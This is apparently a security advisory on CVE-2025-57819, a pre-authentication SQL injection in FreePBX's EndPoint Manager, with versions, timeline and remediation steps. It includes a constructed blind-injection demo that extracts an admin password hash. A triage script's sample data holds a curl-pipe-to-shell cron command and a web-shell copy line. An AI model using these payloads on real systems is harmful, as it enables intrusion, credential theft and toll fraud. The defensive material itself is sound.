What is Sangoma FreePBX?
Sangoma FreePBX is the world's most widely deployed open-source VoIP PBX (Private Branch Exchange) platform, powering business telephony systems for hundreds of thousands of organizations. FreePBX provides web-based administration of Asterisk-based phone systems, including call routing, voicemail, SIP trunk management, and endpoint configuration. The commercial EndPoint Manager (EPM) module extends FreePBX with centralized IP phone provisioning and management. FreePBX instances are valuable targets for attackers seeking to commit toll fraud (unauthorized international calls charged to the victim), intercept calls, harvest SIP credentials for resale, or use the PBX as a pivot point into internal networks.
Overview
CVE-2025-57819 is a critical SQL injection vulnerability (CWE-89) in FreePBX's commercial EndPoint Manager module. Because the vulnerable handler runs before any session check, an unauthenticated attacker reaches the database layer directly (an authentication bypass) and can escalate to remote code execution. User-supplied input is passed into SQL queries without parameterization or sanitization, so the attacker can manipulate the database at will: create rogue administrator accounts, inject malicious cron jobs that are executed as OS commands, or exfiltrate sensitive PBX configuration including SIP credentials. Over 12,000 FreePBX instances were publicly exposed at the time of exploitation. CISA added the vulnerability to the KEV catalog one day after CVE publication, reflecting its severity and confirmed zero-day exploitation.
Affected Versions
| Product | Vulnerable | Fixed |
|---|---|---|
| FreePBX 15.x with EndPoint Manager | All EPM versions < 15.0.66 | EPM 15.0.66 |
| FreePBX 16.x with EndPoint Manager | All EPM versions < 16.0.89 | EPM 16.0.89 |
| FreePBX 17.x with EndPoint Manager | All EPM versions < 17.0.3 | EPM 17.0.3 |
Note: The vulnerability requires the commercial EndPoint Manager (EPM) module to be installed. FreePBX installations without EPM are not vulnerable to this specific CVE. Check for the module's presence rather than for an active commercial license: `fwconsole ma list` prints every installed module with its version, and the `endpoint` module should either be absent or at or above the fixed version for your branch.
Technical Details
The vulnerability (CWE-89: Improper Neutralization of Special Elements Used in an SQL Command) is in the EndPoint Manager module's input handling. User-supplied parameters are passed directly to SQL queries without parameterization, escaping, or input validation. The vulnerable endpoint is reachable before authentication — EPM's handler processes the SQL query before any session check is performed.
A successful exploit chain enables three post-exploitation paths:
- Cron-based RCE: write malicious OS commands into the MySQL `cron_jobs` table; the system's cron daemon executes them on the next scheduled run.
- Admin account creation: insert a rogue administrator account into the FreePBX `ampusers` table, granting persistent web admin access.
- Credential exfiltration: dump the FreePBX database, including SIP trunk credentials, extension passwords, and voicemail PINs.
CVSS 9.8 — network accessible, no authentication, no user interaction required.
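The following added example (not code from FreePBX or from any of the cited research) shows the CWE-89 pattern described above and why pre-authentication reachability matters: a lookup handler that splices its input into the statement text gives an unauthenticated caller a true/false oracle, and that alone is enough to pull the `ampusers` SHA-1 password hash out one character at a time; the bound-parameter form of the same lookup leaks nothing. SQLite stands in for MariaDB/MySQL, the `epm_templates` table and the handler names are hypothetical stand-ins, and all rows are constructed.

```python
"""Boolean-based SQL injection against an unparameterized lookup, next to the
parameterized version that stops it.  Constructed example: SQLite stands in
for FreePBX's MariaDB/MySQL, 'epm_templates' and the handler names are
hypothetical, 'ampusers' mirrors the FreePBX admin table named on this page."""
import hashlib
import sqlite3

# Constructed sample data: the admin account's SHA-1 hash is what the attacker wants.
ADMIN_HASH = hashlib.sha1(b"password").hexdigest()   # 40 hex characters
TEMPLATES = ["default", "sangoma", "yealink"]


def build_db():
    """In-memory database with a FreePBX-like ampusers table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ampusers (username TEXT, password_sha1 TEXT, sections TEXT)")
    conn.execute("INSERT INTO ampusers VALUES ('admin', ?, '*')", (ADMIN_HASH,))
    conn.execute("CREATE TABLE epm_templates (name TEXT)")
    conn.executemany("INSERT INTO epm_templates VALUES (?)", [(t,) for t in TEMPLATES])
    conn.commit()
    return conn


def lookup_template_vulnerable(conn, template):
    """CWE-89: the caller's input becomes part of the statement text."""
    sql = "SELECT name FROM epm_templates WHERE name = '%s'" % template
    return [row[0] for row in conn.execute(sql)]


def lookup_template_fixed(conn, template):
    """Bound parameter: the input is only ever compared as a value."""
    sql = "SELECT name FROM epm_templates WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (template,))]


def oracle_payload(username, pos, ch):
    """Injected condition that holds iff character `pos` of the user's hash is `ch`.
    The trailing '-- ' comments out the closing quote of the original statement."""
    return ("x' OR (SELECT substr(password_sha1,%d,1) FROM ampusers "
            "WHERE username='%s') = '%s' -- " % (pos, username, ch))


def steal_hash(conn, lookup, username, length=40):
    """Recover a SHA-1 hex hash one character at a time through the oracle:
    a non-empty result set means the injected condition was true.  Returns
    whatever was recovered before the oracle stopped answering, so '' against
    the parameterized handler."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            if lookup(conn, oracle_payload(username, pos, ch)):
                recovered += ch
                break
        else:
            break  # no candidate matched: the handler is not leaking
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks the hash:",
          steal_hash(db, lookup_template_vulnerable, "admin") == ADMIN_HASH)
    print("fixed handler leaks anything:     ",
          steal_hash(db, lookup_template_fixed, "admin") != "")
```

Writing rows into `cron_jobs` or `ampusers`, as described above, needs either an injectable write statement or stacked statements; neither is modelled here (sqlite3's `execute()` refuses more than one statement per call, whereas a MySQL driver configured for multi-statements would accept them). The part that carries over unchanged is the fix: with placeholders the input never becomes statement text, so the oracle disappears along with every other injection primitive.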
Discovery
Initially discovered through community reports: system administrators posted to FreePBX forums about broken installations and suspicious behavior in August 2025. Watchtowr Labs subsequently published a detailed technical analysis. IONIX and Horizon3.ai also published independent research.
Exploitation Context
Active exploitation was confirmed from 21 August 2025, roughly one week before the CVE was published, which makes this a zero-day. At that time an estimated 12,000+ FreePBX instances were reachable from the internet without IP filtering or other access controls. CISA added CVE-2025-57819 to the KEV catalog on 29 August 2025, one day after CVE publication, an unusually fast addition that reflects confirmed in-the-wild exploitation. No specific threat actor has been publicly attributed. Given the nature of the target, post-exploitation activity is expected to focus on toll fraud (unauthorized international calls billed to the victim), harvesting SIP credentials for resale on criminal markets, and call interception.
Remediation
- Upgrade EndPoint Manager immediately to the fixed version for your FreePBX branch: EPM 15.0.66 (FreePBX 15), 16.0.89 (FreePBX 16), or 17.0.3 (FreePBX 17). Update via FreePBX Admin → Module Admin → Check Online, or from the shell with `fwconsole ma upgrade endpoint`, and confirm the installed version afterwards with `fwconsole ma list`.
- Restrict FreePBX web admin access — the FreePBX administrative interface should never be directly internet-accessible. Apply firewall rules to limit access to trusted IP ranges (office IPs, VPN addresses). Use a VPN for remote administration.
- Audit administrator accounts: review every account under FreePBX Admin → Admin → Administrators (this is the `ampusers` table the exploit writes to; User Management holds end-user accounts, not web administrators) and remove any you do not recognize.
- Review cron jobs on the FreePBX server: run `crontab -l` as root and as the asterisk user (`crontab -u asterisk -l`), check the `/etc/cron*` directories for unexpected entries, and also inspect the `cron_jobs` table in the FreePBX database, since rows inserted there are executed by FreePBX's scheduled job runner and never appear as crontab entries.
- Rotate all SIP credentials: change the passwords for all SIP trunks and extensions and all voicemail PINs, since these may have been exfiltrated during exploitation.
- Check CDR (Call Detail Records) for unexpected international calls or unusual call patterns that may indicate toll fraud.
- Enable the FreePBX Firewall module (free), which enforces IP allowlisting for the web interface and blocks unauthenticated access to sensitive modules by default.
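An added triage script (not FreePBX code) that applies three of the checks above to database rows: it lists `ampusers` accounts missing from a known-admin roster, flags `cron_jobs` rows that belong to a module that is not installed or whose command looks like a download-and-run, and pulls answered international calls from the CDR since the first observed exploitation date. The rows are constructed; the column names follow the FreePBX `ampusers`, `cron_jobs` and `asteriskcdrdb.cdr` tables as understood here and should be checked against your own schema with `DESCRIBE`; the international dial-prefix list and the roster of installed modules are assumptions for a NANP deployment.

```python
"""Post-exploitation triage for the three paths named on this page: rogue
admin accounts, injected cron_jobs rows and toll-fraud CDR entries.  Added
example, not FreePBX code.  All rows below are constructed; column names are
assumed to match the FreePBX tables and should be verified with DESCRIBE."""
from datetime import datetime

# Constructed sample of: SELECT username, sections FROM asterisk.ampusers
AMPUSERS = [
    {"username": "admin", "sections": "*"},
    {"username": "helpdesk", "sections": "extensions,voicemail"},
    {"username": "ampuser", "sections": "*"},          # not created by staff
]

# Constructed sample of: SELECT id, modulename, jobname, command FROM asterisk.cron_jobs
CRON_JOBS = [
    {"id": 1, "modulename": "backup", "jobname": "backup-1",
     "command": "backup --id=1"},
    {"id": 2, "modulename": "core", "jobname": "cleanup",
     "command": "curl -s http://203.0.113.9/x.sh | sh"},
    {"id": 3, "modulename": "evilmod", "jobname": "persist",
     "command": "bash -c 'cp /tmp/.s /var/www/html/admin/s.php'"},
]

# Constructed sample of: SELECT calldate, src, dst, billsec, disposition FROM asteriskcdrdb.cdr
CDR = [
    {"calldate": "2025-08-20 09:15:02", "src": "201", "dst": "15551230001", "billsec": 84, "disposition": "ANSWERED"},
    {"calldate": "2025-08-22 03:11:40", "src": "201", "dst": "01125211234567", "billsec": 1710, "disposition": "ANSWERED"},
    {"calldate": "2025-08-22 03:12:05", "src": "202", "dst": "00252611234567", "billsec": 1650, "disposition": "ANSWERED"},
    {"calldate": "2025-08-22 03:40:00", "src": "202", "dst": "15551230002", "billsec": 0, "disposition": "NO ANSWER"},
]

INSTALLED_MODULES = {"backup", "core", "endpoint", "framework"}   # assumption: from `fwconsole ma list`
EXPECTED_ADMINS = {"admin", "helpdesk"}                            # assumption: your admin roster
SHELL_INDICATORS = ("curl ", "wget ", "| sh", "| bash", "bash -c", "/tmp/", "base64", "/dev/tcp")
COMPROMISE_START = datetime(2025, 8, 21)   # first observed exploitation, per the timeline


def find_rogue_admins(rows, expected=EXPECTED_ADMINS):
    """Accounts not on the roster, full-access ('*') accounts listed first."""
    rogue = [r for r in rows if r["username"] not in expected]
    return sorted(rogue, key=lambda r: (r["sections"] != "*", r["username"]))


def find_suspicious_cron_jobs(rows, installed=INSTALLED_MODULES):
    """Flag cron_jobs rows owned by a module that is not installed, or whose
    command contains download-and-run indicators.  Returns (id, reasons) pairs."""
    flagged = []
    for r in rows:
        reasons = []
        if r["modulename"] not in installed:
            reasons.append("unknown module")
        hits = [s for s in SHELL_INDICATORS if s in r["command"]]
        if hits:
            reasons.append("shell indicators: " + ", ".join(hits))
        if reasons:
            flagged.append((r["id"], reasons))
    return flagged


def is_international(dst, prefixes=("011", "00", "+")):
    """Dial-prefix heuristic (assumption: NANP 011 and ITU 00 trunk prefixes, or E.164 '+')."""
    return any(dst.startswith(p) for p in prefixes)


def find_toll_fraud(rows, since=COMPROMISE_START, min_billsec=1):
    """Answered international calls since the compromise window, longest first."""
    hits = []
    for r in rows:
        when = datetime.strptime(r["calldate"], "%Y-%m-%d %H:%M:%S")
        if when >= since and is_international(r["dst"]) and r["billsec"] >= min_billsec:
            hits.append(r)
    return sorted(hits, key=lambda r: -r["billsec"])


if __name__ == "__main__":
    print("rogue admins:", [r["username"] for r in find_rogue_admins(AMPUSERS)])
    print("suspicious cron_jobs:", find_suspicious_cron_jobs(CRON_JOBS))
    print("toll-fraud candidates:", [(r["src"], r["dst"], r["billsec"]) for r in find_toll_fraud(CDR)])
```

To run it against a real system, replace the constructed lists with the output of `mysql asterisk -e 'SELECT ...'` (and `mysql asteriskcdrdb ...` for the CDR), and treat every hit as something to remove and rotate, not merely disable: a flagged `cron_jobs` row should be deleted, and a flagged account removed after its password, and those of any legitimate admins, are reset.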
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-57819 |
| Vendor / Product | Sangoma — FreePBX |
| NVD Published | 2025-08-28 |
| NVD Last Modified | 2025-10-24 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-89 |
| CISA KEV Added | 2025-08-29 |
| CISA KEV Deadline | 2025-09-19 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2025-08-21 | Active exploitation begins — zero-day attacks on publicly exposed FreePBX instances |
| 2025-08-28 | CVE published; GitHub security advisory GHSA-m42g-xg4c-5f3h released |
| 2025-08-29 | CISA adds to Known Exploited Vulnerabilities catalog — one day after CVE publication |
| 2025-09-19 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| GitHub Security Advisory — GHSA-m42g-xg4c-5f3h | Vendor Advisory |
| NVD — CVE-2025-57819 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Watchtowr Labs — FreePBX CVE-2025-57819 Technical Analysis | Security Research |
| IONIX — FreePBX Authentication Bypass | Security Research |
| FreePBX Servers Targeted by Zero-Day CVE-2025-57819 | News |
| SANS Internet Storm Center — FreePBX Exploitation | Security Research |